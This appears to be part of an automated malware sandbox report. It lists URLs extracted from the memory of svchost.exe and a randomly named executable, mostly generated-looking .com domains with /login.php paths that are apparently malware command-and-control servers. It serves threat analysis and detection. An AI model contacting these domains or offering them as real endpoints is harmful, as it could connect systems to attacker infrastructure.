Source: svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyver.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywar.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432764888.0000000008B0F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433688306.0000000008B16000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657362701.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1657376102.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432912644.0000000008B12000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432910805.0000000008B11000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvywed.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1610082181.0000000008B24000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401578224.0000000008A76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1613723889.0000000008B28000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617460331.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2066318354.0000000008F4C000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000003.1733070082.0000000008F49000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.00000000010C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyvyxor.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2604355342.0000000000812000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482360119.000000000089F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2606846587.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2138962739.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2483073459.00000000008A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyfan.com/login.php
Source: svchost.exe, 00000002.00000003.1820476887.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxygax.com/
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433247007.0000000008B0A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjaj.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyjod.com/login.php
Source: svchost.exe, 00000002.00000003.1613886596.0000000002FF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008A90000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008D3B000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001C.00000002.2053422068.0000000008CE0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000001F.00000002.1932849520.0000000000BF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxylux.com/
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymin.com/
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxymix.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623952843.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1841242367.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1800870882.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1661335994.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1711907800.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2627419955.0000000008BE7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716704828.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynej.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynyx.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxynyx.com/login.phpn
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysad.com/http://gaqynih.com/http://lyxysad.com/http://lyxysad.com/H
Source: svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569151955.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930409487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysad.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxysun.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytex.com/
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytex.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2104244256.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576652644.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576507810.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxytur.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyvoj.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2623341947.0000000008A23000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1828997616.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599079174.0000000008A25000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2482098917.0000000008A21000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1761273136.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664583329.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1929371959.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617460331.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724324245.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2139975711.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybyl.com/login.php
Source: svchost.exe, 00000002.00000003.1437455290.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433310384.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664665430.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1431777445.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1437941480.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433691652.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1433275152.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1432955986.0000000002FC9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybyv.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1702355410.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710889329.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.phpcom/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595142365.0000000002FAB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1595141664.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufydaq.com/login.php
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/http://lygyjan.com/http://qetynup.com/http://lyvysaj.com/http://gahykeb.com/http:
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/http://lyxytur.com/http://gacypiw.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2048442631.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2058705709.000000000D6CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/login.php
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AA8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1741281252.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AA8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjuq.com/
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1534594675.0000000002F1B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742184996.0000000008B73000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742183929.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533903269.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1763387928.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533888500.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjuq.com/login.php
Source: svchost.exe, 00000002.00000003.1725832517.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1516145875.0000000002FAC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylap.com/login.php
Source: svchost.exe, 00000002.00000003.1411284154.0000000002F30000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1389905582.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609115349.000000000D6CF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1615937487.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402185075.0000000002F2A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1402016007.0000000002FCC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1390680436.0000000002FC9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1411345133.0000000002F34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1401679434.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.1841589649.0000000001139000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000005.00000002.2052149448.0000000008EEC000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.1841991306.00000000014FC000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000006.00000002.2054776037.00000000093A0000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2086886336.0000000009561000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2059646628.000000000824D000.00000004.00000010.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.1859768092.000000000147F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 0000000D.00000002.2073814977.000000000936A000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1919088226.0000000008414000.00000004.00000001.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000011.00000002.1795928621.0000000000838000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000013.00000002.1804176921.0000000000A5F000.00000004.00000020.00020000.00000000.sdmp, ByPjYYbfxzaUlbcWoKUIrnlZiYHb.exe, 00000016.00000002.1826196829.0000000000C79000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufymoq.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1556061520.0000000008A14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937479340.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911552556.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1830571345.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1861091241.0000000008B72000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1559587168.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1576554405.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1552121773.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547049612.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1569149489.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1568014117.0000000002F36000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881038659.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1547357675.0000000002F1C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1918717004.0000000008B71000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1617654306.0000000008B7B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxyp.com/login.php
Source: svchost.exe, 00000002.00000003.1875058594.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1616788232.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2114095830.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1726674244.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2120851467.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2625560575.0000000008B0D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2481952075.0000000008B0B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2481301734.0000000008B05000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664741807.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1826452671.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598016540.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598705927.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710839880.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2081707795.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1598041021.000000000089D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913661867.0000000008AFD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2132271145.0000000008AFD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujybev.com/login.php
Source: svchost.exe, 00000002.00000003.1512721434.0000000008B76000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529606311.000000000089E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1722529774.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512365775.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512224365.0000000008B68000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1724383433.0000000008B7B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529645254.00000000008A1000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1513024330.0000000008B79000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1514730678.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1512837473.0000000008B78000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1716704828.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujycov.com/login.php
Source: svchost.exe, 00000002.00000003.1501618192.0000000000882000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1710718578.0000000008A14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydag.com/
Source: svchost.exe, 00000002.00000002.2626694653.0000000008B77000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2616565446.0000000002F67000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujydap.com/login.php
Source: svchost.exe, 00000002.00000003.1592132421.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2127985207.0000000008B75000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujygug.com/login.php
Source: svchost.exe, 00000002.00000003.1389634570.0000000008AA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujyjav.com/hZ
Source: svchost.exe, 00000002.00000003.1533224308.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1533904520.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1532709108.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylog.com/http://pujylog.com/H
Source: svchost.exe, 00000002.00000003.1575374563.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2044639986.0000000008B6C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2045768203.0000000008B75000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2051969437.0000000008AC6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1573167022.0000000008AC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pujylyv.com/login.php
